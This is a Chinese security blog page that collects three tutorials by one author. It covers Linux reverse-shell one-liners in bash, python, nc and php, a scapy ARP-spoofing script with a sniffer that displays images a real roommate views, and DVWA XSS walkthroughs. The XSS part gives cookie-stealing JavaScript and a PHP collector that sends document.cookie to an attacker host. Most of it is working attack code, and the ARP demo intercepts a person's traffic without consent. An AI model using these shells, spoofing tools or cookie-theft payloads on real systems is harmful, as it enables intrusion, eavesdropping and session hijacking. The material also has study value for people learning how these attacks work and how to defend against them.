作者：LlawLiet

Linux下几种反弹Shell方法的总结与理解

2018年7月27日 by LlawLiet·已关闭评论

*本文原创作者：LlawLiet，本文属FreeBuf原创奖励计划，未经许可禁止转载。

之前在网上看到很多师傅们总结的linux反弹shell的一些方法，为了更熟练的去运用这些技术，于是自己花精力查了很多资料去理解这些命令的含义，将研究的成果记录在这里，所谓的反弹shell，指的是我们在自己的机器上开启监听，然后在被攻击者的机器上发送连接请求去连接我们的机器，将被攻击者的shell反弹到我们的机器上，下面来介绍分析几种常用的方法。

实验环境

CentOS 6.5：192.168.0.3

kali2.0：192.168.0.4

方法1：

反弹shell命令如下：

bash -i >& /dev/tcp/ip/port 0>&1

首先，使用nc在kali上监听端口：

nc -lvp 7777

然后在CentOS6.5下输入：

bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

可以看到shell成功反弹到了kali上面，可以执行命令：

在解释这条反弹shell的命令原理之前，首先需要掌握几个点。

linux文件描述符：linux shell下有三种标准的文件描述符，分别如下：

0 - stdin 代表标准输入,使用<或<<
1 - stdout 代表标准输出,使用>或>>
2 - stderr 代表标准错误输出,使用2>或2>>

还有就是>&这个符号的含义，最好的理解是这样的：

当>&后面接文件时，表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时，表示将前面的文件描述符重定向至后面的文件描述符

也有师傅把&这个符号解释为是取地址符号，学过C语言的小伙伴们都知道&这个符号代表取地址符，在C++中&符号还代表为引用，这样做是为了区分文件描述符和文件，比如查看一个不存在的文件，要把标准错误重定向到标准输出，如果直接cat notexistfile 2>1的话，则会将1看作是一个文件，将标准错误输出输出到1这个文件里而不是标准输出,而&的作用就是为了区分文件和文件描述符：

理解了上面这些知识，下面来解释一下这一条反弹shell的命令首先，bash -i代表在本地打开一个bash，然后就是/dev/tcp/ip/port， /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用，建立一个socket连接，>&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件，也就是传递到远程上，如果远程开启了对应的端口去监听，就会接收到这个bash的标准输出和标准错误输出，这个时候我们在本机CentOS输入命令，输出以及错误输出的内容就会被传递显示到远程。

在本地输入设备（键盘）输入命令，在本地看不到输入的内容，但是键盘输入的命令已经被输出到了远程，然后命令的执行结果或者错误也会被传到远程，查看远程，可以看到标准输出和标准错误输出都重定向到了远程：

下面在该命令后面加上0>&1，代表将标准输入重定向到标准输出，这里的标准输出已经重定向到了/dev/tcp/ip/port这个文件，也就是远程，那么标准输入也就重定向到了远程，这样的话就可以直接在远程输入了：

那么，0>&2也是可以的，代表将标准输入重定向到标准错误输出，而标准错误输出重定向到了/dev/tcp/ip/port这个文件，也就是远程，那么标准输入也就重定向到了远程：

为了更形象的理解，下面给出了整个过程的数据流向，首先是本地的输入输出流向：

执行bash -i >& /dev/tcp/ip/port后

执行bash -i >& /dev/tcp/ip/port 0>&1或者bash -i >& /dev/tcp/ip/port 0>&2后：

方法2：

使用python反弹，反弹shell命令如下：

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先，使用nc在kali上监听端口：

nc -lvp 7777

在CentOS下使用python去反向连接，输入：

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

可以看到kali上成功反弹到了shell，可以执行一些命令：

在已经深入理解了第一种方法的原理后，下面来解释一下python反弹shell的原理。

首先使用socket与远程建立起连接，接下来使用到了os库的dup2方法将标准输入、标准输出、标准错误输出重定向到远程，dup2这个方法有两个参数，分别为文件描述符fd1和fd2，当fd2参数存在时，就关闭fd2，然后将fd1代表的那个文件强行复制给fd2，在这里可以把fd1和fd2看作是C语言里的指针，将fd1赋值给fd2，就相当于将fd2指向于s.fileno()，fileno()返回的是一个文件描述符，在这里也就是建立socket连接返回的文件描述符，经过测试可以看到值为3。

于是这样就相当于将标准输入(0)、标准输出(1)、标准错误输出(2)重定向到远程(3)，接下来使用os的subprocess在本地开启一个子进程，传入参数“-i”使bash以交互模式启动，标准输入、标准输出、标准错误输出又被重定向到了远程，这样的话就可以在远程执行输入命令了。

方法3：

使用nc反弹shell,需要的条件是被反弹shell的机器安装了nc，CentOS6.5安装nc方法如下：

1、下载安装
wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
tar -zxvf netcat-0.7.1.tar.gz -C /usr/local
cd /usr/local
mv netcat-0.7.1 netcat
cd /usr/local/netcat
./configure
make && make install
2、配置
vim /etc/profile
添加以下内容：
# set  netcat path
export NETCAT_HOME=/usr/local/netcat
export PATH=$PATH:$NETCAT_HOME/bin
保存，退出，并使配置生效：
source /etc/profile
3、测试
nc -help成功

之后在kali上使用nc监听端口：

nc -lvp 7777

在CentOS上使用nc去反向连接，命令如下：

nc -e /bin/bash 192.168.0.4 7777

这里的-e后面跟的参数代表的是在创建连接后执行的程序，这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash)，也就是反弹一个shell给远程，可以看到远程已经成功反弹到了shell，并且可以执行命令。

注意之前使用nc监听端口反弹shell时都会有一个警告：Warning: forward host lookup failed for bogon: Unknown host,根据nc帮助文档的提示加上-n参数就可以不产生这个警告了，-n参数代表在建立连接之前不对主机进行dns解析。

nc -nlvp 7777

如果nc不支持-e参数的话，可以利用到linux中的管道符，首先在kali上开启监听：

nc -nvlp 6666
nc -nvlp 7777

之后在CentOS上使用nc去反向链接：

nc 192.168.0.4 6666|/bin/bash|192.168.0.4 7777

这里通过在kali上监听两个端口，然后在使用CentOS进行反向连接的时候使用到了管道符，管道符的作用是把管道符前的输出作为管道符后的输入，这样的话就可以在远程的6666端口的输入设备（键盘）输入命令，将命令输出传递至本地的/bin/bash，通过本地shell解释执行命令后，将命令执行的结果以及错误输入到远程的7777端口。

方法4：

使用php反弹shell，方法如下。
首先最简单的一个办法，就是使用php的exec函数执行方法1反弹shell的命令：

php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

还有一个是之前乌云知识库上的一个姿势，使用php的fsockopen去连接远程：

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'

这个姿势看起来有一些难以理解，尤其是还出现了<&这个符号，当然如果把&看着是取地址符或者是引用，那还是可以理解的，为了更方便的理解，我在这将这条命令稍微修改了一下，类似于前面的第二种方法。

有了之前的基础，我们知道3代表的是使用fsockopen函数建立socket返回的文件描述符，这里将标准输入，标准输出和标准错误输出都重定向到了远程

在CentOS上反向连接，输入：

php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

注意php反弹shell的这些方法都需要php关闭safe_mode这个选项，才可以使用exec函数。

总结

写这篇文章加上查阅资料花了一天多的时间，感觉自己现在真正的将这四种方法理解透了，能够自己去写一些反弹shell的命令了，所以付出还是值得的，网上还有不少反弹shell的命令，以后自己会不断的补充，It’s the climb！

*本文原创作者：LlawLiet，本文属FreeBuf原创奖励计划，未经许可禁止转载。

ARP协议分析&python编程实现ARP欺骗抓图片

2018年1月23日 by LlawLiet·已关闭评论

*本文作者：LlawLiet，本文属 FreeBuf 原创奖励计划，未经许可禁止转载。

序

这篇文章研究了arp协议，并且利用python编程实现一次简单的局域网arp攻击，抓取室友网上浏览的图片（滑稽脸）

实战环境

1.kali2.0操作系统，本人用的32位的，装在vm12虚拟机中

2.python2.7.13，kali2.0自带

3.一个局域网和室友的电脑

4.kali所支持的无线网卡，型号为RT3070，某宝四十多就能能买到，主要用来抓取无线数据包，因为windows自带无线网卡kali不支持

选择kali支持的无线网卡可参考链接：http://www.freebuf.com/articles/wireless/140065.html

不过要注意一点，wn722n型号的无线网卡只有v1才支持kali，现在网上大多数卖的都是v2的，如果选择这一款买的时候要好好看一下，不要选错

arp协议研究

在进行arp攻击之前，先来研究一下arp协议

arp协议的全称为地址解析协议，是一种工作在网络层的协议，是一种将ip地址转换为MAC地址（物理地址）的协议

因为在OSI七层模型中，ip地址在第三层网络层，传送的是ip数据报，mac地址在第二层数据链路层，传送的是数据帧，二层的以太网交换设备并不能识别32位的IP地址，它们是以48位以太网地址（就是我们常说的MAC地址）传输以太网数据包（帧）的，局域网的机器要和其他机器进行通信，首先要获取对方的物理地址，所以arp协议便把ip地址转换为物理地址来实现这种对应关系

arp协议数据包

arp协议分析&python编程实现arp欺骗抓图片

op:1(op值为1说明这是一次arp请求)

hwsrc：发送方MAC地址（即本机器MAC地址）

psrc：发送方ip地址（即本机内网ip地址）

hwdst：目标MAC地址（在这里为未知00：00：00：00：00：00）

pdst：目标ip地址（即网关ip地址，一般为192.168.0.1/192.168.1.1）

局域网内所有机器接收此arp请求，如果发现请求的ip为自己的ip便会向请求机器发送arp响应，将自己的MAC地址带入arp响应包单播发送给请求的机器，arp响应包主要字段如下

op:2(op值为2说明这是一次arp响应)

hwsrc：发送方MAC地址（即网关MAC地址）

psrc：发送方ip地址（即网关ip地址）

hwdst：目标MAC地址（为发起arp请求的机器的MAC地址）

pdst：目标ip地址（为发起arp请求的机器的ip地址）

这样发起 arp 请求的机器从 arp 响应包里获取 MAC 地址并添加到本机 arp 缓存中，与网关进行通信，在这里要注意一点，在本机向网关发送 arp 请求的同时，网关也会向本机发送 arp 请求获取本机 MAC 地址，同时本机也会向网关发送 arp 响应，这时一个双向的过程，这里不再重复

接下来为了更清楚的理解，用 wireshark 抓包来观察一下 arp 请求包和响应包

选择抓包的网卡接口，在这选择wlan0，并向网关发起ping请求与网关通信，本机 ip 为192.168.0.106，网关ip为192.168.0.1

arp协议分析&python编程实现arp欺骗抓图片

在过滤窗口输入arp&&ip.addr==192.168.0.1将arp数据包过滤出来

观察arp请求包和响应包是否和上述描述的一致，图中做出了详细标明

arp请求包

arp响应包

arp协议分析&python编程实现arp欺骗抓图片

arp欺骗

上面描述完了arp协议，下面来说一下arp欺骗攻击，假设局域网内有三台机器

网关:192.168.0.1

受害者机器：192.168.0.108

本机kali：192.168.0.106

正常情况下，如果受害者和网关要进行通信，首先要使用arp协议进行对方的MAC地址获取，但是如果攻击者不断的向受害者发送arp响应包，告诉受害者网关的MAC地址为自己的MAC地址，包的大致内容如下

op:2(op值为2说明这是一次arp响应)

hwsrc：发送方MAC地址（攻击者MAC地址）

psrc：发送方ip地址（网关ip地址）

hwdst：目标MAC地址（受害者MAC地址）

pdst：目标ip地址（受害者ip地址）

在这里发送方ip是网关的ip，但是发送方MAC已经变为了攻击者（kali）的MAC地址，受害者不断的接收这个arp响应包，便会在自己的arp缓存中不断的更新错误的ip与MAC的对应关系，及网关的MAC为攻击者的MAC，由此攻击者的网卡便可以捕获到受害者到网关之间的流量，到现在实现了arp断网，受害者因为与错误的MAC地址进行通讯而上不了网，如果攻击者的机器开启了ip转发，便可以将从受害者截取到的流量转发出去给网关，实现arp欺骗，也称为中间人攻击

arp欺骗一般是双向欺骗，我们通过arp欺骗可以捕获到受害者到网关的流量，同样的我们可以向网关发送arp响应包欺骗网关受害者的MAC地址为自己的MAC地址，截获网关到受害者之间的流量，arp响应包大致如下

op:2(op值为2说明这是一次arp响应)

hwsrc：发送方MAC地址（攻击者MAC地址）

psrc：发送方ip地址（受害者ip地址）

hwdst：目标MAC地址（网关MAC地址）

pdst：目标ip地址（网关ip地址）

同样的网关在不断接受到此arp响应时也会不断的更新自己的arp缓存去建立错误的关系，我们的kali攻击机便可以双向的截获流量

用python实现arp攻击

所需的python第三方库

scapy库：scapy是一个可用于网络嗅探的非常强大的第三方库。可以伪造，嗅探或发送网络数据包，这这里我们使用scapy库伪造arp响应包并发送,首先安装scapy库，kali默认自带

pip install scapy

模拟攻击环境,一个真实的局域网，就是我们寝室

自己的kali攻击机:192.168.0.106,装在vm虚拟机中，连接了RT3070型号的无线网卡

室友的电脑:192.168.0.108，连接同一路由器的无线网

网关：192.168.0.1

编写python代码：arpattack.py

from scapy.all import *#导入scapy模块
from optparse import OptionParser#导入命令行参数处理模块optparse
import sys
def main():
    usage="Usage: [-i interface] [-t targetip] [-g gatewayip]"
    parser=OptionParser(usage)
    parser.add_option('-i',dest='interface',help='select interface(input eth0 or wlan0 or more)')#-i 所选择的网卡，eth0或wlan0，存放在interface变量中
    parser.add_option('-t',dest='targetip',help='select ip to spoof')#-t 要攻击的ip，存放在targetip变量中
    parser.add_option('-g',dest='gatewayip',help='input gateway ip')#-g 网关ip，存放在gatewayip变量中
    (options,args)=parser.parse_args()
    if options.interface and options.targetip and options.gatewayip:
        interface=options.interface
        tip=options.targetip
        gip=options.gatewayip
        spoof(interface,tip,gip)#将参数传给spoof函数
    else:
        parser.print_help()#显示帮助
        sys.exit(0)
def spoof(interface,tip,gip):#获取命令行的输入实现arp攻击
    localmac=get_if_hwaddr(interface)#get_if_hwaddr获取本地网卡MAC地址
    tmac=getmacbyip(tip)#根据目标ip获取其MAC地址
    gmac=getmacbyip(gip)#根据网关ip获取其MAC地址
    ptarget=Ether(src=localmac,dst=tmac)/ARP(hwsrc=localmac,psrc=gip,hwdst=tmac,pdst=tip,op=2)#构造arp响应包，欺骗目标机器网关的MAC地址为本机MAC地址
    pgateway=Ether(src=localmac,dst=gmac)/ARP(hwsrc=localmac,psrc=tip,hwdst=gmac,pdst=gip,op=2)#构造arp响应包，欺骗网关目标机器的MAC地址为本机MAC地址
    try:
        while 1:
            sendp(ptarget,inter=2,iface=interface)
            print "send arp reponse to target(%s),gateway(%s) macaddress is %s"%(tip,gip,localmac)
            sendp(pgateway,inter=2,iface=interface)
            print "send arp reponse to gateway(%s),target(%s) macaddress is %s"%(gip,tip,localmac)#不断发送arp响应包欺骗目标机器和网关，直到ctrl+c结束程序
    except KeyboardInterrupt:
        sys.exit(0)
if __name__=='__main__':
    main()

脚本使用到的scapy库中的几个函数

get_if_hwaddr("本地网卡名称（eth0/wlan0）")    根据所选择的本地网卡获取相应的本地网卡的MAC地址

arp协议分析&python编程实现arp欺骗抓图片

getmacbyip（"ip地址"）    根据ip地址获取其MAC地址，使用该函数实际上使用了一次arp协议，可以用此函数获取网关和目标的MAC地址

arp协议分析&python编程实现arp欺骗抓图片

ARP是构建ARP数据包的类，Ether用来构建以太网数据包，构造arp数据包并加上以太网头部

Ether(src=本地网卡MAC,dst=目标机器MAC)/ARP(hwsrc=本地网卡MAC,psrc=网关ip,hwdst=目标机器MAC,pdst=目标机器ip,op=2)
构造发送给目标机器的arp数据包，并加上以太网头部，欺骗目标机器网关的MAC为本机的MAC

Ether(src=本地网卡MAC,dst=网关MAC)/ARP(hwsrc=本地网卡MAC,psrc=网关ip,hwdst=网关MAC,pdst=网关ip,op=2)
构造发送给网关的arp数据包，并加上以太网头部，欺骗网关目标机器的MAC为本机的MAC

sendp函数发送我们构造的arp数据包    sendp(数据包, inter=2, iface=网卡)    sendp函数工作在网络的第二层

以上代码实现了类似于arpspoof工具的功能，使用方法，进入脚本目录，输入

python arpattack.py -h

查看脚本使用帮助

Usage: [-i interface] [-t targetip] [-g gatewayip]

Options:
    -h, --help    show this help message and exit
    -i INTERFACE  select interface(input eth0 or wlan0 or more)
    -t TARGETIP   select ip to spoof
    -g GATEWAYIP  input gateway ip

所以我们这样输入可以双向的欺骗网关和目标机器完中间人攻击

python arpattack.py -i 网卡 -t 要攻击的目标的ip地址 -g 网关ip

输入

python arpattack.py -i wlan0 -t 192.168.0.8 -g 192.168.0.1

选择无线网卡wlan0的MAC地址去欺骗室友的电脑和网关路由器，如果我和室友都插了网线，就要选择eth0

运行脚本便会不断的向室友的电脑和网关发送arp响应包进行双向欺骗，效果如下

arp协议分析&python编程实现arp欺骗抓图片

室友电脑 arp 缓存

路由器 arp 缓存

arp协议分析&python编程实现arp欺骗抓图片

这时我们截获了室友电脑和网关之间的流量，使其不能相互通信，完成了arp断网

echo "1">/proc/sys/net/ipv4/ip_forward

开启流量转发，这时室友和网关正常通讯，但是流量会经过我们的网卡

接下来用python编写代码查看室友电脑浏览的网页图片，其实不难，因为浏览图片一般都是向服务器发送一次请求图片的http请求，所以只需从经过我们网卡的流量中过滤tcp80端口的数据包（http协议），将数据包的头部层层去掉，最后便能得到应用层的http数据包，在利用正则表达式将http://*.jpg筛选出来即可知道室友请求了哪些图片，python的pcap库和dpkt库可以使我们很容易的得到电脑网卡流量中的http应用层数据包

apt-get install libpcap-dev

pip install pypcap

pip install dpkt

安装pcap库和dpkt库

pcap模块的pcap方法可以返回一个用来捕获网卡数据包的pcap对象

dpkt，一个数据包解析工具，可以解析离线/实时pcap数据包

python代码如下stealimg.py

import pcap
import dpkt
import re
import requests
from PIL import Image
from io import BytesIO
from optparse import OptionParser
import sys
urllist=[]
def main():
    usage="Usage: [-i interface]"
    parser=OptionParser(usage)
    parser.add_option('-i',dest='interface',help='select interface(input eth0 or wlan0 or more)')
    (options,args)=parser.parse_args()
    if options.interface:
        interface=options.interface
        pc=pcap.pcap(interface)
        pc.setfilter('tcp port 80')
        for ptime,pdata in pc:
            getimg(pdata)
    else:
        parser.print_help()
        sys.exit(0)
def getimg(pdata):
    global urllist
    p=dpkt.ethernet.Ethernet(pdata)
    if p.data.__class__.__name__=='IP':
        if p.data.data.__class__.__name__=='TCP':
            if p.data.data.dport==80:
                pa=re.compile(r'GET (.*?\.jpg)')#|.*?\.png|.*?\.gif
                img=re.findall(pa,p.data.data.data)
                if img!=[]:
                    lines=p.data.data.data.split('\n')
                    for line in lines:
                        if 'Host:' in line:
                            url='http://'+line.split(':')[-1].strip()+img[-1]
                            if url not in urllist:
                                urllist.append(url)
                                if 'Referer:' in p.data.data.data:
                                    for line in lines:
                                        if 'Referer:' in line:
                                            referer=line.split(':')[-1].strip()
                                            print url
                                            r=requests.get(url,headers={'Referer':referer})
                                            img=Image.open(BytesIO(r.content))
                                            img.show()
                                else:
                                    r=requests.get(url)
                                    img=Image.open(BytesIO(r.content))
                                    img.show()
                            else:
                                pass
if __name__=='__main__':
    main()

代码将pcap从本机网卡捕获到的完整的网络数据包使用dpkt库将其中封装的http应用层数据包提取出来，通过正则表达式将请求图片的http请求过滤出来，并在本机请求并输出，完成窥屏，效果如下

用法 stealimg,py -i wlan0

室友电脑浏览图片

arp协议分析&python编程实现arp欺骗抓图片

自己kali可以窥屏

arp协议分析&python编程实现arp欺骗抓图片

注意一点，百度的图片爬取要在http请求头中加上Referer字段，否则会出现403禁止访问，代码只是简单的实现了窥屏的效果，还有着很多不足，不过通过这次学习可以对arp欺骗攻击有更深的理解

*本文作者：LlawLiet，本文属 FreeBuf 原创奖励计划，未经许可禁止转载。

新手科普 | 通过DVWA学习XSS

2017年12月31日 by LlawLiet·已关闭评论

简介

这篇文章通过 dvwa 简单研究了三种类型的 xss，并且讲述了如何利用 xss 获取目标网站用户的 cookie。

dvwa反射型xss

测试环境

一台 win2003 虚拟机，ip 为 192.168.50.128，用wamp集成环境将dvwa搭在8080端口。

一台 win7 虚拟机，ip 为 192.168.50.150，用来接受漏洞网站的cookie，web由phpstudy搭建。

low级别

为了便于理解，代码如下：

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

可以看出没有任何过滤，直接将用户提交的GET参数name输出到页面，我们可以输入payload。

<script>alert("xss")</script>

来验证xss的存在。

接下来是利用xss获取用户cookie,由于script标签可以加载远程服务器的javascript代码并且执行，所以我们在win7的服务器下编写cookie.js。

document.write("<form action='http://192.168.50.150/dvwaxss/steal.php' name='exploit' method='post' style='display:none'>");
document.write("<input type='hidden' name='data' value='"+document.cookie+"'>");
document.write("</form>");
document.exploit.submit();

这段js代码的作用是在页面中构造一个隐藏表单和一个隐藏域，内容为当前的cookie，并且以post方式发送到同目录下的steal.php。

<?php
header("content-type:text/html;charset=utf-8");
$conn=mysql_connect("localhost","root","root");
mysql_select_db("dvwacookie",$conn);
if(isset($_GET['data']))
{
    $sql="insert into low(cookie) values('".$_GET['data']."');";
    $result=mysql_query($sql,$conn);
    mysql_close();
}
else if(isset($_POST['data']))
{
    $sql="insert into low(cookie) values('".$_POST['data']."');";
    $result=mysql_query($sql,$conn);
    mysql_close();
}
else
{
    $sql="select * from low";
    $result=mysql_query($sql,$conn);
    while($row=mysql_fetch_array($result))
    {
        echo "偷取的cookie:".$row[1]."</br>";
    }
    mysql_close();
}
?>

steal.php将我们获取到的cookie存到数据库中。

create database dvwacookie;
use dvwacookie;
create table low(id int not null auto_increment primary key,cookie varchar(100) not null);
create table medium(id int not null auto_increment primary key,cookie varchar(100) not null);
create table high(id int not null auto_increment primary key,cookie varchar(100) not null);

接下来我们在有xss漏洞的位置插入。

<script src=http://192.168.50.150/dvwaxss/cookie.js></script>

相当于构造链接。

http://192.168.50.128:8080/DVWA-master/vulnerabilities/xss_r/?name=<script src=http://192.168.50.150/dvwaxss/cookie.js></script>

将链接发给该网站下的受害者，受害者点击时就会加载远程服务器（这里是win7）的cookie.js脚本，这里要提一点，用src加载远程服务器的js脚本，那么js的源就会变成加载它的域，从而可以读取该域的数据。

这时，win7的数据库就接收到了cookie。

通过DVWA学习XSS

medium级别

代码如下：

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

可看出代码将我们输入内容中的<script>标签替换为了空，但是str_replace这个函数是不区分大小写的，而且只替换一次，所以我们构造payload。

<scr<script>ipt>alert("xss")</script>
<SCRIPT>alert("xss")</SCRIPT>

均可以弹框，同样的，插入。

<scr<script>ipt src=http://192.168.50.150/dvwaxss/cookie.js></script>
<SCRIPT src=http://192.168.50.150/dvwaxss/cookie.js></SCRIPT>

加载远程脚本steal.php。

<?php
header("content-type:text/html;charset=utf-8");
$conn=mysql_connect("localhost","root","root");
mysql_select_db("dvwacookie",$conn);
if(isset($_GET['data']))
{
    $sql="insert into medium(cookie) values('".$_GET['data']."');";
    $result=mysql_query($sql,$conn);
    mysql_close();
}
else if(isset($_POST['data']))
{
    $sql="insert into medium(cookie) values('".$_POST['data']."');";
    $result=mysql_query($sql,$conn);
    mysql_close();
}
else
{
    $sql="select * from medium";
    $result=mysql_query($sql,$conn);
    while($row=mysql_fetch_array($result))
    {
        echo "偷取的cookie:".$row[1]."</br>";
    }
    mysql_close();
}
?>

将获取的cookie加入medium表，结果如下：

通过DVWA学习XSS

high 级别

代码如下：

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

发现添加了对大小写绕过的判断，而且根据正则表达式过滤，提交内容只要有script顺序出现的字母都一律过滤掉，只是过滤了script标签，但是有一些javascript事件后仍然能执行javascript代码，构造payload。

<img src=# onerror=alert("xss")>

通过加载一个不存在的图片出错出发javascript onerror事件,继续弹框，证明出来有xss，这样的payload还有很多。

通过DVWA学习XSS

在xss的位置插入。

<img src=# onerror=(location.href="http://192.168.50.150/dvwaxss/steal.php?data="+document.cookie)>

通过触发onerror事件跳转链接到远程服务器的steal.php，同时以GET带上当前的cookie，但是输入被过滤了。

只剩下Hello .cookie)>，what！？不应该啊,在这被坑了好久，终于发现问题所在。

<img SrC=# oneRror=(locatIon.href="httP://192.168.50.150/dvwaxss/steal.php?data="+documenT.cookie)>

注意观察我们所插入的代码，我表明的大写部分，竟然构成了一个script，所以符合代码的正则，从而过滤掉了，这实在是坑啊……那我们将插入代码中的i进行html编码。

<img src=# onerror=(locat&#x69;on.href="http://192.168.50.150/dvwaxss/steal.php?data="+document.cookie)>

我们提交这段代码后绕过了过滤，然后浏览器进行了html解码，然后就是之前一样的过程，触发onerror事件，对远程服务器的steal.php发送我们的cookie steal.php。

<?php
header("content-type:text/html;charset=utf-8");
$conn=mysql_connect("localhost","root","root");
mysql_select_db("dvwacookie",$conn);
if(isset($_GET['data']))
{
    $sql="insert into high(cookie) values('".$_GET['data']."');";
    $result=mysql_query($sql,$conn);
    mysql_close();
}
else if(isset($_POST['data']))
{
    $sql="insert into high(cookie) values('".$_POST['data']."');";
    $result=mysql_query($sql,$conn);
mysql_close();
}
else
{
    $sql="select * from high";
    $result=mysql_query($sql,$conn);
    while($row=mysql_fetch_array($result))
    {
        echo "偷取的cookie:".$row[1]."</br>";
    }
    mysql_close();
}
?>

远程服务器接收到了cookie的信息。

通过DVWA学习XSS

dvwa存储型xss

存储型xss的不同之处在于它可以将用户构造的有害输入直接存储起来，不需要攻击者构造链接诱使受害人点击触发，而是目标网站的用户只要访问插入恶意代码的网站就能触发，相比较反射型xss更为隐蔽，危害更大，受害者也会更多，在这我将介绍几种更为隐蔽的方式获取用户cookie。

测试环境

同上次的一样，一台win2003虚拟机，ip为192.168.50.128，用wamp集成环境将dvwa搭在8080端口。

一台win7虚拟机，ip为192.168.50.150,用来接受漏洞网站的cookie，web由phpstudy搭建。

low级别

为了便于理解，代码如下

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

可以看出对有害输入没有任何过滤，直接将用户提交的内容插入数据库，输入点在两个输入框都有，但是后面的几种难度都对Message域的输入内容进行了htmlspecialchars转义，为了和后面的一致，我们将payload插入Name域测试xss,在此之前用firebug将Name输入框的maxlength改为600，一开始为10，然后输入payload。

Name:<script>alert("xss")</script>
Message:testxss

通过DVWA学习XSS

简单的一个弹框，弹框可见我们的payload已经储存到了数据库，只要访问该页面的用户都会触发xss。

下面我们编写payload偷取该网站下用户的cookie，构造payload。

Name:<script src="http://192.168.50.150/dvwaxss/cookie.js"></script>
Message:testxss

用script标签加载远程服务器上我们编写的获取cookie的js代码，上一节我们编写的是下面的代码。

document.write("<form action='http://192.168.50.150/dvwaxss/steal.php' name='exploit' method='post' style='display:none'>");
document.write("<input type='hidden' name='data' value='"+document.cookie+"'>");
document.write("</form>");
document.exploit.submit();

这段js代码的作用是在页面中构造一个隐藏表单和一个隐藏域，内容为当前的cookie，并且以post方式发送到同目录下的steal.php，但是这种方式有个缺点就是将cookie发送到steal.php后他会刷新页面跳转到steal.php，这样的做法难免会引起用户的怀疑，我们需要用一种更为隐蔽的方式，这里我们用ajax技术，一种异步的javascript,在不刷新页面的前提下神不知鬼不觉的将用户的cookie发送到steal.php。

var url = "http://192.168.50.150/dvwaxss/steal.php";
var postStr = "data="+document.cookie;
var ajax = null;
if (window.XMLHttpRequest) {
    ajax = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    ajax = new ActiveXObject("Microsoft.XMLHTTP");
} else {
    ajax=null;
}
ajax.open("POST", url, true);//true代表异步
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajax.send(postStr);

上面编写的代码创建了一个ajax对象，构造了一个post请求将用户的cookie作为参数发送到了http://192.168.50.150/dvwaxss/steal.php，也就是当前目录下的steal.php。

<?php
header("content-type:text/html;charset=utf-8");
$conn=mysql_connect("localhost","root","root");
mysql_select_db("dvwacookie",$conn);
if(isset($_GET['data']))
{
    $sql="insert into low(cookie) values('".$_GET['data']."');";
    $result=mysql_query($sql,$conn);
    mysql_close();
}
else if(isset($_POST['data']))
{
    $sql="insert into low(cookie) values('".$_POST['data']."');";
    $result=mysql_query($sql,$conn);
    mysql_close();
}
else
{
    $sql="select * from low";
    $result=mysql_query($sql,$conn);
    while($row=mysql_fetch_array($result))
    {
        echo "偷取的cookie:".$row[1]."</br>";
    }
    mysql_close();
}
?>

steal.php将我们获取到的cookie存到数据库中，我们先删除目标网站数据中之前我们插入的payload，然后输入。

Name:<script src="http://192.168.50.150/dvwaxss/cookie.js"></script>
Message:send cookie use ajax

通过DVWA学习XSS

用src加载远程服务器的js脚本，那么js就是该网站所信任的，那么js的源就会变成加载它的域，从而可以读取该域的数据，比如用户cookie，我们将请求提交后可以看到当前页面将http://192.168.50.150/dvwaxss/cookie.js加载了进来。

通过DVWA学习XSS

然后观察firebug的javascript控制台，看到

已拦截跨源请求：同源策略禁止读取位于 http://192.168.50.150/dvwaxss/steal.php 的远程资源。（原因：CORS 头缺少 'Access-Control-Allow-Origin'）

通过DVWA学习XSS

